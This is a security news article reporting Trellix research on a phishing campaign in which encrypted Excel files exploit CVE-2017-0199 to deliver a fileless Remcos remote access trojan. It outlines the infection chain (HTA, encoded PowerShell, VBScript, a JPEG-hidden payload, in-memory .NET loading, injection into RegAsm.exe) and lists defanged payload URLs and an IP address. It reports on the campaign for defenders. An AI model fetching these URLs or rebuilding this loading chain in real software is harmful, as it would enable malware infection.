Remcos is a Remote Access Trojan (RAT) that allows attackers to gain unauthorized control over infected computers.
This RAT has been weaponized and commonly used in cybercriminal activities since its introduction in 2016.
Trellix researchers recently warned of weaponized Excel documents that were found delivering fileless Remcos RAT.
Weaponized Excel Document
In this new malware campaign, threat actors were found exploiting a critical vulnerability in Microsoft Office and WordPad’s handling of OLE objects, which was tracked as “CVE-2017-0199.”
Decoding Compliance: What CISOs Need to Know – Join Free Webinar
Here the attack begins with a phishing email containing an encrypted Excel file that appears protected, enticing user interaction.
Upon opening the file it exploits CVE-2017-0199 to execute embedded OLE objects by downloading a malicious HTA file from a URL (hxxps://slug.vercel.app/wyiqkf).
This HTA file then executes PowerShell commands with base64-encoded parameters which helps in retrieving a VBScript from “hxxp://45.90.89.50/100/instantflowercaseneedbeautygirlsherealways.gIF.”
The VBScript contains obfuscated data and this data when processed by PowerShell, generates additional PowerShell processes.
These processes download a JPEG file (hxxp://servidorwindows.ddns.com.br/Files/vbs.jpeg) containing the final payload.
The attack injects a fileless variant of the Remcos RAT into a legitimate Windows process, reads the report.
In this campaign threat actors’ strategies demonstrated their sophisticated evasion tactics, as they primarily targeted the following sectors in Belgium, Japan, USA, South Korea, Canada, Germany, and Australia:-
- Government
- Manufacturing
- IT
- Banking
It’s part of a trend that includes similar attacks deploying malware like “RevengeRAT,” “SnakeKeylogger,” “GuLoader,” “AgentTesla,” and “FormBook.”
The multi-stage approach employs techniques such as T1221 (Template Injection) and T1059.001 (Visual Basic Scripting) to bypass security measures, highlighting the evolving complexity of cyber threats that leverage seemingly harmless documents to deliver powerful malware payloads.
The attack begins with a JPEG file containing an embedded base64-encoded ‘dnlib.dll’, an open-source .NET library for assembly manipulation.
This dll is decoded and loaded directly into memory via System.Reflection.Assembly, a .NET class enabling runtime assembly operations.
PowerShell then downloads a text file with base64-encoded data from a malicious URL. This data is decoded and processed by the loaded dnlib.dll to generate an in-memory .NET assembly of Remcos RAT.
The RAT is then injected into the legitimate Windows process ‘RegAsm.exe’ for execution, and this process leaves minimal traces of Remcos-associated behaviors.
Remcos establishes persistence through process injection that ensures continuous attacker access.
This sophisticated approach combines vulnerability exploitation, memory-only .NET assemblies, and advanced evasion techniques, illustrating the complexity of modern malware.
Simulating Cyberattack Scenarios With All-in-One Cybersecurity Platform – Watch Free Webinar